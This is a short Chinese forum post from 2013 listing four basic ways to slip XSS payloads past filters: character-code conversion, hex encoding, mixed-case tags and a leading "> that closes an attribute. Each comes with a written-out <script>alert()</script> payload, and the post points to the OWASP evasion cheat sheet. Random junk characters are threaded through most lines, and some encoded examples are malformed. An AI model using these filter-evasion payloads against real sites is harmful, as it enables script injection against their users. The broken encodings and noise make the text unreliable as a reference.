四种超级基础的绕过方法。2 X& h4 e" f; J- y" O" s
1.转换为ASCII码
7 l- l( E3 c+ Y9 y$ f例子:原脚本为<script>alert(‘I love F4ck’)</script >
- ^0 w- _( |# q8 v i通过转换,变成:1 T5 h# [7 s( s' ^$ z2 `. Q+ I8 u0 R
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>. [. m9 U3 g5 Y
/ \. Y) c2 }4 t# G$ e6 X
2.转换为HEX(十六进制)
8 y. d# ~, Q- c' {例子:原脚本为<script>alert(‘I love F4ck’)</script>) h) S/ ~: o+ p
通过转换,变成:/ e# l, C) G6 s
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
0 L; S* y& |* s& s: | e- t8 ]# Z `/ Z7 G, S5 Y9 ~' A* ?
3.转换脚本的大小写% ~8 \( q5 p# F i9 S, s
例子:原脚本为<script>alert(‘I love F4ck’)</script>- m+ u* |2 ^/ P9 A+ {( w c
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>. V0 I9 \, p* [# R3 G2 E2 q0 I$ ^
# `0 R' V8 @4 Q/ l H7 U4.增加闭合标记”> Z( B0 v/ q+ [" c0 b* d9 O* u
例子:原脚本为<script>alert(‘I love F4ck’)</script># K8 w& a$ j5 k# |
转换为:”><script>alert(‘I love F4ck’)</script>5 l" U2 q/ \/ q; t
更详细绕过技术请参考此网页5 Q) U& h- d2 F3 _& R7 h' M4 S. `
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
j$ ~$ w1 ~! g. Q' A' o
) m/ U0 c. {$ V+ j. W" U% A转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对